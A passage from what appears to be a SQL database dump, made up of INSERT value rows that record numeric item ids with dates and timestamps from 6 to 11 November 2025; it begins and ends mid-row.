14:10:01'),(94556,3005,1,'2025-11-06','2025-11-06 14:20:45'),(94557,4668,1,'2025-11-06','2025-11-06 15:11:29'),(94558,3127,1,'2025-11-06','2025-11-06 15:27:23'),(94559,4400,1,'2025-11-06','2025-11-06 15:56:04'),(94560,2748,1,'2025-11-06','2025-11-06 16:22:22'),(94561,5146,1,'2025-11-06','2025-11-06 16:34:27'),(94562,5128,1,'2025-11-06','2025-11-06 16:45:08'),(94563,4520,1,'2025-11-06','2025-11-06 16:58:10'),(94564,3781,1,'2025-11-06','2025-11-06 17:21:46'),(94565,5461,1,'2025-11-06','2025-11-06 17:22:07'),(94566,3069,1,'2025-11-06','2025-11-06 17:23:19'),(94567,5515,1,'2025-11-06','2025-11-06 17:25:49'),(94568,3752,1,'2025-11-06','2025-11-06 17:35:29'),(94569,5512,1,'2025-11-06','2025-11-06 17:51:56'),(94570,5276,1,'2025-11-06','2025-11-06 17:57:54'),(94571,4660,1,'2025-11-06','2025-11-06 17:58:54'),(94572,5570,1,'2025-11-06','2025-11-06 18:01:22'),(94573,5454,1,'2025-11-06','2025-11-06 18:01:54'),(94574,4529,1,'2025-11-06','2025-11-06 18:07:57'),(94575,5578,1,'2025-11-06','2025-11-06 18:13:18'),(94576,91,1,'2025-11-06','2025-11-06 18:22:43'),(94577,4722,1,'2025-11-06','2025-11-06 18:23:21'),(94578,3117,1,'2025-11-06','2025-11-06 18:29:20'),(94579,5406,1,'2025-11-06','2025-11-06 18:29:58'),(94580,2904,1,'2025-11-06','2025-11-06 18:41:10'),(94581,4494,1,'2025-11-06','2025-11-06 18:46:43'),(94582,3038,1,'2025-11-06','2025-11-06 18:53:28'),(94583,5409,1,'2025-11-06','2025-11-06 18:53:36'),(94584,5441,1,'2025-11-06','2025-11-06 18:53:39'),(94585,5125,1,'2025-11-06','2025-11-06 18:53:46'),(94586,1586,1,'2025-11-06','2025-11-06 19:05:17'),(94587,4977,1,'2025-11-06','2025-11-06 19:09:00'),(94588,5449,1,'2025-11-06','2025-11-06 19:17:40'),(94589,5461,1,'2025-11-06','2025-11-06 19:34:46'),(94590,5492,1,'2025-11-06','2025-11-06 19:37:47'),(94591,4681,1,'2025-11-06','2025-11-06 19:45:05'),(94592,110,1,'2025-11-06','2025-11-06 19:47:54'),(94593,2775,1,'2025-11-06','2025-11-06 21:00:43'),(94594,5518,1,'2025-11-06','2025-11-06 21:21:36'),(94595,3109,1,'2025-11-06','2025-11-06 21:21:46'),(94596,2617,1,'2025-11-06','2025-11-06 21:21:46'),(94597,486,1,'2025-11-06','2025-11-06 21:24:02'),(94598,1582,1,'2025-11-06','2025-11-06 21:53:31'),(94599,4454,1,'2025-11-06','2025-11-06 21:54:23'),(94600,4556,1,'2025-11-06','2025-11-06 23:15:43'),(94601,477,1,'2025-11-07','2025-11-07 00:40:06'),(94602,3791,1,'2025-11-07','2025-11-07 01:36:26'),(94603,4950,1,'2025-11-07','2025-11-07 03:05:48'),(94604,1870,1,'2025-11-07','2025-11-07 03:15:41'),(94605,1778,1,'2025-11-07','2025-11-07 03:15:49'),(94606,1745,1,'2025-11-07','2025-11-07 03:54:46'),(94607,1606,1,'2025-11-07','2025-11-07 04:37:05'),(94608,1582,1,'2025-11-07','2025-11-07 05:03:08'),(94609,4335,1,'2025-11-07','2025-11-07 05:18:26'),(94610,4612,1,'2025-11-07','2025-11-07 05:47:18'),(94611,5457,1,'2025-11-07','2025-11-07 07:36:02'),(94612,1608,1,'2025-11-07','2025-11-07 07:48:28'),(94613,2801,1,'2025-11-07','2025-11-07 09:21:25'),(94614,5522,1,'2025-11-07','2025-11-07 11:15:28'),(94615,5464,1,'2025-11-07','2025-11-07 13:02:47'),(94616,5495,1,'2025-11-07','2025-11-07 13:18:47'),(94617,5461,1,'2025-11-07','2025-11-07 13:56:28'),(94618,5484,1,'2025-11-07','2025-11-07 13:59:19'),(94619,5378,1,'2025-11-07','2025-11-07 15:25:02'),(94620,2704,1,'2025-11-07','2025-11-07 16:30:52'),(94621,2704,1,'2025-11-07','2025-11-07 16:31:46'),(94622,5502,1,'2025-11-07','2025-11-07 17:12:45'),(94623,80,1,'2025-11-07','2025-11-07 17:13:03'),(94624,3781,1,'2025-11-07','2025-11-07 17:24:25'),(94625,5433,1,'2025-11-07','2025-11-07 17:24:37'),(94626,5515,1,'2025-11-07','2025-11-07 17:27:03'),(94627,5515,1,'2025-11-07','2025-11-07 17:33:09'),(94628,5457,1,'2025-11-07','2025-11-07 17:34:04'),(94629,3752,1,'2025-11-07','2025-11-07 17:36:05'),(94630,4660,1,'2025-11-07','2025-11-07 17:39:00'),(94631,4529,1,'2025-11-07','2025-11-07 17:45:47'),(94632,5425,1,'2025-11-07','2025-11-07 17:48:24'),(94633,5489,1,'2025-11-07','2025-11-07 17:55:48'),(94634,4400,1,'2025-11-07','2025-11-07 17:58:05'),(94635,3752,1,'2025-11-07','2025-11-07 17:59:30'),(94636,5406,1,'2025-11-07','2025-11-07 18:04:13'),(94637,3117,1,'2025-11-07','2025-11-07 18:05:08'),(94638,5428,1,'2025-11-07','2025-11-07 18:09:01'),(94639,5409,1,'2025-11-07','2025-11-07 18:09:30'),(94640,72,1,'2025-11-07','2025-11-07 18:31:36'),(94641,5420,1,'2025-11-07','2025-11-07 18:32:40'),(94642,5436,1,'2025-11-07','2025-11-07 18:37:15'),(94643,5464,1,'2025-11-07','2025-11-07 18:58:27'),(94644,4712,1,'2025-11-07','2025-11-07 18:58:34'),(94645,110,1,'2025-11-07','2025-11-07 18:59:04'),(94646,4944,1,'2025-11-07','2025-11-07 19:28:30'),(94647,4950,1,'2025-11-07','2025-11-07 20:07:59'),(94648,91,1,'2025-11-07','2025-11-07 21:13:24'),(94649,4842,1,'2025-11-08','2025-11-08 00:10:15'),(94650,4733,1,'2025-11-08','2025-11-08 01:25:02'),(94651,467,1,'2025-11-08','2025-11-08 01:28:12'),(94652,1730,1,'2025-11-08','2025-11-08 01:40:42'),(94653,2804,1,'2025-11-08','2025-11-08 03:04:59'),(94654,72,1,'2025-11-08','2025-11-08 03:19:09'),(94655,4494,1,'2025-11-08','2025-11-08 03:30:04'),(94656,2297,1,'2025-11-08','2025-11-08 03:38:40'),(94657,3430,1,'2025-11-08','2025-11-08 03:39:49'),(94658,2904,1,'2025-11-08','2025-11-08 03:56:08'),(94659,4866,1,'2025-11-08','2025-11-08 04:01:11'),(94660,76,1,'2025-11-08','2025-11-08 04:06:07'),(94661,80,1,'2025-11-08','2025-11-08 04:07:58'),(94662,1588,1,'2025-11-08','2025-11-08 04:25:01'),(94663,1588,1,'2025-11-08','2025-11-08 04:26:49'),(94664,4612,1,'2025-11-08','2025-11-08 04:31:08'),(94665,1741,1,'2025-11-08','2025-11-08 05:59:59'),(94666,5518,1,'2025-11-08','2025-11-08 07:13:34'),(94667,5526,1,'2025-11-08','2025-11-08 07:38:42'),(94668,5268,1,'2025-11-08','2025-11-08 07:40:02'),(94669,3269,1,'2025-11-08','2025-11-08 08:06:42'),(94670,5476,1,'2025-11-08','2025-11-08 09:45:16'),(94671,4950,1,'2025-11-08','2025-11-08 09:49:34'),(94672,80,1,'2025-11-08','2025-11-08 10:08:47'),(94673,2148,1,'2025-11-08','2025-11-08 13:29:59'),(94674,5502,1,'2025-11-08','2025-11-08 14:01:09'),(94675,4966,1,'2025-11-08','2025-11-08 16:22:42'),(94676,3307,1,'2025-11-08','2025-11-08 17:16:24'),(94677,5397,1,'2025-11-08','2025-11-08 17:24:53'),(94678,5512,1,'2025-11-08','2025-11-08 17:32:51'),(94679,5570,1,'2025-11-08','2025-11-08 17:42:28'),(94680,1877,1,'2025-11-08','2025-11-08 17:45:21'),(94681,5578,1,'2025-11-08','2025-11-08 17:53:26'),(94682,5400,1,'2025-11-08','2025-11-08 17:54:27'),(94683,4722,1,'2025-11-08','2025-11-08 17:59:50'),(94684,2904,1,'2025-11-08','2025-11-08 18:05:56'),(94685,3038,1,'2025-11-08','2025-11-08 18:08:24'),(94686,5561,1,'2025-11-08','2025-11-08 18:08:29'),(94687,5441,1,'2025-11-08','2025-11-08 18:11:28'),(94688,5125,1,'2025-11-08','2025-11-08 18:11:37'),(94689,1711,1,'2025-11-08','2025-11-08 18:12:00'),(94690,5567,1,'2025-11-08','2025-11-08 18:15:31'),(94691,3045,1,'2025-11-08','2025-11-08 18:21:17'),(94692,1877,1,'2025-11-08','2025-11-08 18:27:57'),(94693,5449,1,'2025-11-08','2025-11-08 18:32:41'),(94694,4950,1,'2025-11-08','2025-11-08 18:54:42'),(94695,76,1,'2025-11-08','2025-11-08 18:56:48'),(94696,2420,1,'2025-11-08','2025-11-08 19:02:26'),(94697,4983,1,'2025-11-08','2025-11-08 19:12:38'),(94698,5461,1,'2025-11-08','2025-11-08 20:01:18'),(94699,102,1,'2025-11-08','2025-11-08 20:02:22'),(94700,5492,1,'2025-11-08','2025-11-08 20:29:39'),(94701,84,1,'2025-11-08','2025-11-08 20:35:02'),(94702,4950,1,'2025-11-08','2025-11-08 20:46:04'),(94703,4681,1,'2025-11-08','2025-11-08 21:22:21'),(94704,91,1,'2025-11-08','2025-11-08 22:10:33'),(94705,480,1,'2025-11-08','2025-11-08 22:56:40'),(94706,91,1,'2025-11-08','2025-11-08 23:27:18'),(94707,3430,1,'2025-11-09','2025-11-09 01:51:17'),(94708,5609,1,'2025-11-09','2025-11-09 01:54:00'),(94709,3731,1,'2025-11-09','2025-11-09 02:44:05'),(94710,5163,1,'2025-11-09','2025-11-09 04:10:46'),(94711,4950,1,'2025-11-09','2025-11-09 04:14:21'),(94712,5567,1,'2025-11-09','2025-11-09 04:14:46'),(94713,4988,1,'2025-11-09','2025-11-09 05:20:10'),(94714,68,1,'2025-11-09','2025-11-09 05:30:31'),(94715,3102,1,'2025-11-09','2025-11-09 05:45:11'),(94716,474,1,'2025-11-09','2025-11-09 06:59:58'),(94717,4888,1,'2025-11-09','2025-11-09 07:24:57'),(94718,5601,1,'2025-11-09','2025-11-09 08:15:04'),(94719,1770,1,'2025-11-09','2025-11-09 09:13:19'),(94720,89,1,'2025-11-09','2025-11-09 09:25:56'),(94721,1586,1,'2025-11-09','2025-11-09 09:45:24'),(94722,2991,1,'2025-11-09','2025-11-09 10:20:02'),(94723,4950,1,'2025-11-09','2025-11-09 10:29:44'),(94724,477,1,'2025-11-09','2025-11-09 11:02:55'),(94725,3694,1,'2025-11-09','2025-11-09 11:30:45'),(94726,102,1,'2025-11-09','2025-11-09 12:12:24'),(94727,3541,1,'2025-11-09','2025-11-09 12:58:57'),(94728,89,1,'2025-11-09','2025-11-09 13:39:34'),(94729,4866,1,'2025-11-09','2025-11-09 13:46:35'),(94730,5522,1,'2025-11-09','2025-11-09 14:16:28'),(94731,5400,1,'2025-11-09','2025-11-09 14:59:31'),(94732,5522,1,'2025-11-09','2025-11-09 15:12:52'),(94733,5549,1,'2025-11-09','2025-11-09 15:28:46'),(94734,1877,1,'2025-11-09','2025-11-09 15:29:15'),(94735,3781,1,'2025-11-09','2025-11-09 15:36:19'),(94736,5062,1,'2025-11-09','2025-11-09 15:39:27'),(94737,3083,1,'2025-11-09','2025-11-09 17:13:39'),(94738,1728,1,'2025-11-09','2025-11-09 17:23:38'),(94739,3083,1,'2025-11-09','2025-11-09 17:28:22'),(94740,4930,1,'2025-11-09','2025-11-09 17:34:32'),(94741,3175,1,'2025-11-09','2025-11-09 18:35:53'),(94742,2395,1,'2025-11-09','2025-11-09 19:00:43'),(94743,5605,1,'2025-11-09','2025-11-09 19:00:51'),(94744,5593,1,'2025-11-09','2025-11-09 19:02:59'),(94745,3781,1,'2025-11-09','2025-11-09 19:28:17'),(94746,5406,1,'2025-11-09','2025-11-09 19:33:33'),(94747,5163,1,'2025-11-09','2025-11-09 19:51:52'),(94748,4436,1,'2025-11-09','2025-11-09 19:56:54'),(94749,5397,1,'2025-11-09','2025-11-09 20:04:20'),(94750,5428,1,'2025-11-09','2025-11-09 20:09:46'),(94751,1745,1,'2025-11-09','2025-11-09 20:09:48'),(94752,2993,1,'2025-11-09','2025-11-09 20:15:49'),(94753,110,1,'2025-11-09','2025-11-09 20:37:51'),(94754,2609,1,'2025-11-09','2025-11-09 20:38:38'),(94755,4950,1,'2025-11-09','2025-11-09 20:40:45'),(94756,1612,1,'2025-11-09','2025-11-09 21:34:07'),(94757,4420,1,'2025-11-09','2025-11-09 21:53:08'),(94758,3261,1,'2025-11-09','2025-11-09 21:53:19'),(94759,68,1,'2025-11-09','2025-11-09 22:04:20'),(94760,5502,1,'2025-11-09','2025-11-09 22:13:52'),(94761,5512,1,'2025-11-09','2025-11-09 22:43:59'),(94762,3694,1,'2025-11-09','2025-11-09 22:51:28'),(94763,5415,1,'2025-11-09','2025-11-09 22:58:47'),(94764,5598,1,'2025-11-09','2025-11-09 23:29:24'),(94765,5598,1,'2025-11-09','2025-11-09 23:29:25'),(94766,80,1,'2025-11-09','2025-11-09 23:42:30'),(94767,91,1,'2025-11-09','2025-11-09 23:47:30'),(94768,3087,1,'2025-11-09','2025-11-09 23:53:50'),(94769,5454,1,'2025-11-10','2025-11-10 00:18:34'),(94770,4950,1,'2025-11-10','2025-11-10 00:51:21'),(94771,5400,1,'2025-11-10','2025-11-10 01:21:33'),(94772,91,1,'2025-11-10','2025-11-10 01:22:44'),(94773,5310,1,'2025-11-10','2025-11-10 01:28:48'),(94774,4529,1,'2025-11-10','2025-11-10 01:29:41'),(94775,5425,1,'2025-11-10','2025-11-10 02:10:03'),(94776,1715,1,'2025-11-10','2025-11-10 02:23:48'),(94777,5492,1,'2025-11-10','2025-11-10 03:07:48'),(94778,5578,1,'2025-11-10','2025-11-10 03:11:07'),(94779,2801,1,'2025-11-10','2025-11-10 03:34:44'),(94780,3674,1,'2025-11-10','2025-11-10 03:38:48'),(94781,2297,1,'2025-11-10','2025-11-10 04:17:18'),(94782,2704,1,'2025-11-10','2025-11-10 04:27:55'),(94783,87,1,'2025-11-10','2025-11-10 04:31:25'),(94784,76,1,'2025-11-10','2025-11-10 04:31:55'),(94785,2704,1,'2025-11-10','2025-11-10 04:37:16'),(94786,72,1,'2025-11-10','2025-11-10 04:44:56'),(94787,108,1,'2025-11-10','2025-11-10 04:45:03'),(94788,468,1,'2025-11-10','2025-11-10 04:45:09'),(94789,84,1,'2025-11-10','2025-11-10 04:45:13'),(94790,474,1,'2025-11-10','2025-11-10 04:45:17'),(94791,2503,1,'2025-11-10','2025-11-10 04:45:22'),(94792,1877,1,'2025-11-10','2025-11-10 04:45:26'),(94793,335,1,'2025-11-10','2025-11-10 04:45:34'),(94794,5605,1,'2025-11-10','2025-11-10 04:45:39'),(94795,5598,1,'2025-11-10','2025-11-10 04:45:43'),(94796,2904,1,'2025-11-10','2025-11-10 04:45:51'),(94797,91,1,'2025-11-10','2025-11-10 04:45:56'),(94798,5593,1,'2025-11-10','2025-11-10 04:46:05'),(94799,5601,1,'2025-11-10','2025-11-10 04:46:09'),(94800,1872,1,'2025-11-10','2025-11-10 04:46:13'),(94801,76,1,'2025-11-10','2025-11-10 04:46:18'),(94802,74,1,'2025-11-10','2025-11-10 04:46:22'),(94803,4930,1,'2025-11-10','2025-11-10 04:46:26'),(94804,473,1,'2025-11-10','2025-11-10 04:46:30'),(94805,80,1,'2025-11-10','2025-11-10 04:46:35'),(94806,68,1,'2025-11-10','2025-11-10 04:46:42'),(94807,470,1,'2025-11-10','2025-11-10 04:46:46'),(94808,89,1,'2025-11-10','2025-11-10 04:46:51'),(94809,1870,1,'2025-11-10','2025-11-10 04:46:56'),(94810,487,1,'2025-11-10','2025-11-10 04:47:00'),(94811,87,1,'2025-11-10','2025-11-10 04:47:05'),(94812,469,1,'2025-11-10','2025-11-10 04:55:42'),(94813,72,1,'2025-11-10','2025-11-10 05:01:46'),(94814,5553,1,'2025-11-10','2025-11-10 05:01:55'),(94815,5588,1,'2025-11-10','2025-11-10 05:01:59'),(94816,72,1,'2025-11-10','2025-11-10 05:02:04'),(94817,5618,1,'2025-11-10','2025-11-10 05:02:10'),(94818,72,1,'2025-11-10','2025-11-10 05:02:15'),(94819,5549,1,'2025-11-10','2025-11-10 05:02:21'),(94820,5545,1,'2025-11-10','2025-11-10 05:02:25'),(94821,5573,1,'2025-11-10','2025-11-10 05:02:30'),(94822,5622,1,'2025-11-10','2025-11-10 05:02:34'),(94823,5614,1,'2025-11-10','2025-11-10 05:02:39'),(94824,72,1,'2025-11-10','2025-11-10 05:02:43'),(94825,5557,1,'2025-11-10','2025-11-10 05:02:49'),(94826,5539,1,'2025-11-10','2025-11-10 05:02:54'),(94827,469,1,'2025-11-10','2025-11-10 05:02:58'),(94828,467,1,'2025-11-10','2025-11-10 05:03:02'),(94829,5412,1,'2025-11-10','2025-11-10 05:03:05'),(94830,3691,1,'2025-11-10','2025-11-10 05:03:11'),(94831,3664,1,'2025-11-10','2025-11-10 05:03:32'),(94832,3694,1,'2025-11-10','2025-11-10 05:03:36'),(94833,476,1,'2025-11-10','2025-11-10 05:03:40'),(94834,5578,1,'2025-11-10','2025-11-10 05:03:53'),(94835,5582,1,'2025-11-10','2025-11-10 05:03:57'),(94836,5561,1,'2025-11-10','2025-11-10 05:04:02'),(94837,5515,1,'2025-11-10','2025-11-10 05:04:06'),(94838,5512,1,'2025-11-10','2025-11-10 05:04:14'),(94839,5585,1,'2025-11-10','2025-11-10 05:04:18'),(94840,5570,1,'2025-11-10','2025-11-10 05:04:34'),(94841,5567,1,'2025-11-10','2025-11-10 05:04:38'),(94842,102,1,'2025-11-10','2025-11-10 05:04:47'),(94843,5378,1,'2025-11-10','2025-11-10 05:04:51'),(94844,5326,1,'2025-11-10','2025-11-10 05:05:00'),(94845,5415,1,'2025-11-10','2025-11-10 05:05:17'),(94846,5146,1,'2025-11-10','2025-11-10 05:05:22'),(94847,5248,1,'2025-11-10','2025-11-10 05:05:27'),(94848,5330,1,'2025-11-10','2025-11-10 05:05:31'),(94849,5071,1,'2025-11-10','2025-11-10 05:05:49'),(94850,5374,1,'2025-11-10','2025-11-10 05:05:58'),(94851,5383,1,'2025-11-10','2025-11-10 05:06:03'),(94852,5259,1,'2025-11-10','2025-11-10 05:06:07'),(94853,5067,1,'2025-11-10','2025-11-10 05:06:12'),(94854,5153,1,'2025-11-10','2025-11-10 05:06:17'),(94855,5363,1,'2025-11-10','2025-11-10 05:06:21'),(94856,5080,1,'2025-11-10','2025-11-10 05:06:39'),(94857,5140,1,'2025-11-10','2025-11-10 05:06:43'),(94858,5609,1,'2025-11-10','2025-11-10 05:06:48'),(94859,5076,1,'2025-11-10','2025-11-10 05:06:57'),(94860,5264,1,'2025-11-10','2025-11-10 05:07:01'),(94861,5157,1,'2025-11-10','2025-11-10 05:07:06'),(94862,5626,1,'2025-11-10','2025-11-10 05:07:11'),(94863,1582,1,'2025-11-10','2025-11-10 05:07:20'),(94864,2503,1,'2025-11-10','2025-11-10 05:07:26'),(94865,4941,1,'2025-11-10','2025-11-10 05:07:30'),(94866,4911,1,'2025-11-10','2025-11-10 05:07:34'),(94867,4938,1,'2025-11-10','2025-11-10 05:07:39'),(94868,4966,1,'2025-11-10','2025-11-10 05:07:43'),(94869,4950,1,'2025-11-10','2025-11-10 05:07:48'),(94870,4963,1,'2025-11-10','2025-11-10 05:07:52'),(94871,4944,1,'2025-11-10','2025-11-10 05:07:57'),(94872,4960,1,'2025-11-10','2025-11-10 05:08:02'),(94873,472,1,'2025-11-10','2025-11-10 05:08:06'),(94874,2411,1,'2025-11-10','2025-11-10 05:08:11'),(94875,2420,1,'2025-11-10','2025-11-10 05:08:15'),(94876,2410,1,'2025-11-10','2025-11-10 05:08:19'),(94877,2419,1,'2025-11-10','2025-11-10 05:08:24'),(94878,2395,1,'2025-11-10','2025-11-10 05:08:28'),(94879,471,1,'2025-11-10','2025-11-10 05:08:32'),(94880,1608,1,'2025-11-10','2025-11-10 05:08:37'),(94881,1584,1,'2025-11-10','2025-11-10 05:08:42'),(94882,1602,1,'2025-11-10','2025-11-10 05:08:48'),(94883,1596,1,'2025-11-10','2025-11-10 05:08:53'),(94884,1588,1,'2025-11-10','2025-11-10 05:08:58'),(94885,1590,1,'2025-11-10','2025-11-10 05:09:03'),(94886,1604,1,'2025-11-10','2025-11-10 05:09:08'),(94887,1606,1,'2025-11-10','2025-11-10 05:09:13'),(94888,1592,1,'2025-11-10','2025-11-10 05:09:18'),(94889,1598,1,'2025-11-10','2025-11-10 05:09:24'),(94890,1586,1,'2025-11-10','2025-11-10 05:09:29'),(94891,89,1,'2025-11-10','2025-11-10 05:09:35'),(94892,1594,1,'2025-11-10','2025-11-10 05:09:40'),(94893,1600,1,'2025-11-10','2025-11-10 05:09:45'),(94894,1544,1,'2025-11-10','2025-11-10 05:09:50'),(94895,89,1,'2025-11-10','2025-11-10 05:09:56'),(94896,488,1,'2025-11-10','2025-11-10 05:10:02'),(94897,486,1,'2025-11-10','2025-11-10 05:10:06'),(94898,477,1,'2025-11-10','2025-11-10 05:10:10'),(94899,482,1,'2025-11-10','2025-11-10 05:10:14'),(94900,485,1,'2025-11-10','2025-11-10 05:10:24'),(94901,484,1,'2025-11-10','2025-11-10 05:10:28'),(94902,478,1,'2025-11-10','2025-11-10 05:10:37'),(94903,481,1,'2025-11-10','2025-11-10 05:10:41'),(94904,1612,1,'2025-11-10','2025-11-10 05:10:42'),(94905,479,1,'2025-11-10','2025-11-10 05:10:46'),(94906,480,1,'2025-11-10','2025-11-10 05:10:50'),(94907,483,1,'2025-11-10','2025-11-10 05:10:54'),(94908,4573,1,'2025-11-10','2025-11-10 05:13:49'),(94909,4612,1,'2025-11-10','2025-11-10 05:31:16'),(94910,1713,1,'2025-11-10','2025-11-10 05:41:25'),(94911,477,1,'2025-11-10','2025-11-10 06:26:21'),(94912,3023,1,'2025-11-10','2025-11-10 06:43:39'),(94913,1544,1,'2025-11-10','2025-11-10 06:52:02'),(94914,5406,1,'2025-11-10','2025-11-10 06:53:00'),(94915,5578,1,'2025-11-10','2025-11-10 07:00:08'),(94916,4440,1,'2025-11-10','2025-11-10 07:23:47'),(94917,5605,1,'2025-11-10','2025-11-10 08:58:45'),(94918,2704,1,'2025-11-10','2025-11-10 08:59:25'),(94919,5409,1,'2025-11-10','2025-11-10 09:14:50'),(94920,5464,1,'2025-11-10','2025-11-10 09:25:30'),(94921,5561,1,'2025-11-10','2025-11-10 09:31:52'),(94922,5259,1,'2025-11-10','2025-11-10 09:40:03'),(94923,1590,1,'2025-11-10','2025-11-10 09:54:49'),(94924,4432,1,'2025-11-10','2025-11-10 09:54:50'),(94925,5125,1,'2025-11-10','2025-11-10 09:59:43'),(94926,2704,1,'2025-11-10','2025-11-10 10:04:55'),(94927,3714,1,'2025-11-10','2025-11-10 10:15:46'),(94928,1718,1,'2025-11-10','2025-11-10 10:38:52'),(94929,1701,1,'2025-11-10','2025-11-10 11:17:29'),(94930,4963,1,'2025-11-10','2025-11-10 11:23:16'),(94931,80,1,'2025-11-10','2025-11-10 11:56:09'),(94932,80,1,'2025-11-10','2025-11-10 11:56:32'),(94933,4950,1,'2025-11-10','2025-11-10 12:06:41'),(94934,4323,1,'2025-11-10','2025-11-10 12:21:59'),(94935,5406,1,'2025-11-10','2025-11-10 14:20:52'),(94936,3045,1,'2025-11-10','2025-11-10 14:31:48'),(94937,4835,1,'2025-11-10','2025-11-10 14:53:46'),(94938,5264,1,'2025-11-10','2025-11-10 15:02:49'),(94939,2704,1,'2025-11-10','2025-11-10 15:03:33'),(94940,2704,1,'2025-11-10','2025-11-10 15:39:26'),(94941,2704,1,'2025-11-10','2025-11-10 15:39:48'),(94942,2704,1,'2025-11-10','2025-11-10 15:44:53'),(94943,5573,1,'2025-11-10','2025-11-10 16:16:14'),(94944,1604,1,'2025-11-10','2025-11-10 16:38:11'),(94945,5605,1,'2025-11-10','2025-11-10 17:13:08'),(94946,2956,1,'2025-11-10','2025-11-10 17:23:45'),(94947,5526,1,'2025-11-10','2025-11-10 17:24:02'),(94948,4404,1,'2025-11-10','2025-11-10 17:24:21'),(94949,5119,1,'2025-11-10','2025-11-10 19:05:37'),(94950,2609,1,'2025-11-10','2025-11-10 19:15:57'),(94951,2751,1,'2025-11-10','2025-11-10 19:18:02'),(94952,5605,1,'2025-11-10','2025-11-10 20:00:05'),(94953,5467,1,'2025-11-10','2025-11-10 20:00:34'),(94954,5502,1,'2025-11-10','2025-11-10 21:03:26'),(94955,76,1,'2025-11-10','2025-11-10 21:07:26'),(94956,3307,1,'2025-11-10','2025-11-10 21:27:25'),(94957,3030,1,'2025-11-10','2025-11-10 21:34:02'),(94958,5292,1,'2025-11-10','2025-11-10 21:55:28'),(94959,5292,1,'2025-11-10','2025-11-10 21:55:30'),(94960,5292,1,'2025-11-10','2025-11-10 21:55:41'),(94961,1728,1,'2025-11-10','2025-11-10 22:02:15'),(94962,3092,1,'2025-11-10','2025-11-10 22:14:26'),(94963,1877,1,'2025-11-10','2025-11-10 22:20:47'),(94964,4582,1,'2025-11-10','2025-11-10 22:58:57'),(94965,5449,1,'2025-11-10','2025-11-10 23:04:04'),(94966,4639,1,'2025-11-10','2025-11-10 23:13:09'),(94967,3705,1,'2025-11-10','2025-11-10 23:25:55'),(94968,4950,1,'2025-11-10','2025-11-10 23:34:30'),(94969,80,1,'2025-11-10','2025-11-10 23:35:46'),(94970,5549,1,'2025-11-10','2025-11-10 23:50:53'),(94971,4977,1,'2025-11-11','2025-11-11 00:02:23'),(94972,1722,1,'2025-11-11','2025-11-11 00:11:26'),(94973,5598,1,'2025-11-11','2025-11-11 00:28:26'),(94974,3710,1,'2025-11-11','2025-11-11 00:54:04'),(94975,3282,1,'2025-11-11','2025-11-11 00:54:07'),(94976,1745,1,'2025-11-11','2025-11-11 01:13:09'),(94977,91,1,'2025-11-11','2025-11-11 01:35:35'),(94978,5512,1,'2025-11-11','2025-11-11 01:36:05'),(94979,1703,1,'2025-11-11','2025-11-11 02:10:15'),(94980,5515,1,'2025-11-11','2025-11-11 02:34:01'),(94981,4960,1,'2025-11-11','2025-11-11 02:43:59'),(94982,5062,1,'2025-11-11','2025-11-11 02:51:51'),(94983,5412,1,'2025-11-11','2025-11-11 03:17:53'),(94984,5346,1,'2025-11-11','2025-11-11 03:23:43'),(94985,4830,1,'2025-11-11','2025-11-11 03:23:52'),(94986,5626,1,'2025-11-11','2025-11-11 03:23:55'),(94987,4520,1,'2025-11-11','2025-11-11 03:24:50'),(94988,5433,1,'2025-11-11','2025-11-11 03:30:41'),(94989,4332,1,'2025-11-11','2025-11-11 04:06:15'),(94990,3752,1,'2025-11-11','2025-11-11 04:07:53'),(94991,2704,1,'2025-11-11','2025-11-11 04:26:56'),(94992,4983,1,'2025-11-11','2025-11-11 04:51:56'),(94993,1582,1,'2025-11-11','2025-11-11 05:02:38'),(94994,3752,1,'2025-11-11','2025-11-11 05:12:41'),(94995,5484,1,'2025-11-11','2025-11-11 05:37:14'),(94996,467,1,'2025-11-11','2025-11-11 05:39:41'),(94997,5436,1,'2025-11-11','2025-11-11 06:06:37'),(94998,4753,1,'2025-11-11','2025-11-11 06:47:04'),(94999,5454,1,'2025-11-11','2025-11-11 07:19:05'),(95000,5461,1,'2025-11-11','2025-11-11 07:19:48'),(95001,1610,1,'2025-11-11','2025-11-11 07:28:33'),(95002,3486,1,'2025-11-11','2025-11-11 07:36:37'),(95003,4756,1,'2025-11-11','2025-11-11 07:41:03'),(95004,1608,1,'2025-11-11','2025-11-11 07:46:33'),(95005,2152,1,'2025-11-11','2025-11-11 08:11:04'),(95006,4566,1,'2025-11-11','2025-11-11 08:11:04'),(95007,3051,1,'2025-11-11','2025-11-11 08:23:44'),(95008,4950,1,'2025-11-11','2025-11-11 08:27:33'),(95009,4648,1,'2025-11-11','2025-11-11 08:36:07'),(95010,5492,1,'2025-11-11','2025-11-11 09:35:59'),(95011,4660,1,'2025-11-11','2025-11-11 09:46:25'),(95012,5146,1,'2025-11-11','2025-11-11 10:36:25'),(95013,2410,1,'2025-11-11','2025-11-11 10:42:27'),(95014,1608,1,'2025-11-11','2025-11-11 11:09:23'),(95015,1703,1,'2025-11-11','2025-11-11 11:19:09'),(95016,4436,1,'2025-11-11','2025-11-11 11:25:39'),(95017,5593,1,'2025-11-11','2025-11-11 11:35:28'),(95018,5400,1,'2025-11-11','2025-11-11 11:57:21'),(95019,4960,1,'2025-11-11','2025-11-11 12:06:14'),(95020,4960,1,'2025-11-11','2025-11-11 12:07:22'),(95021,4944,1,'2025-11-11','2025-11-11 12:14:47'),(95022,3005,1,'2025-11-11','2025-11-11 12:15:55'),(95023,110,1,'2025-11-11','2025-11-11 12:16:38'),(95024,1730,1,'2025-11-11','2025-11-11 12:28:21'),(95025,5441,1,'2025-11-11','2025-11-11 12:29:24'),(95026,5441,1,'2025-11-11','2025-11-11 12:29:37'),(95027,3092,1,'2025-11-11','2025-11-11 12:36:41'),(95028,5441,1,'2025-11-11','2025-11-11 12:41:04'),(95029,5441,1,'2025-11-11','2025-11-11 12:41:13'),(95030,5428,1,'2025-11-11','2025-11-11 12:52:20'),(95031,1872,1,'2025-11-11','2025-11-11 12:57:02'),(95032,2704,1,'2025-11-11','2025-11-11 13:08:42'),(95033,84,1,'2025-11-11','2025-11-11 13:13:55'),(95034,2704,1,'2025-11-11','2025-11-11 13:14:21'),(95035,76,1,'2025-11-11','2025-11-11 13:16:54'),(95036,5464,1,'2025-11-11','2025-11-11 13:24:07'),(95037,4866,1,'2025-11-11','2025-11-11 13:30:51'),(95038,4950,1,'2025-11-11','2025-11-11 14:08:04'),(95039,4966,1,'2025-11-11','2025-11-11 16:08:44'),(95040,467,1,'2025-11-11','2025-11-11 16:17:32'),(95041,87,1,'2025-11-11','2025-11-11 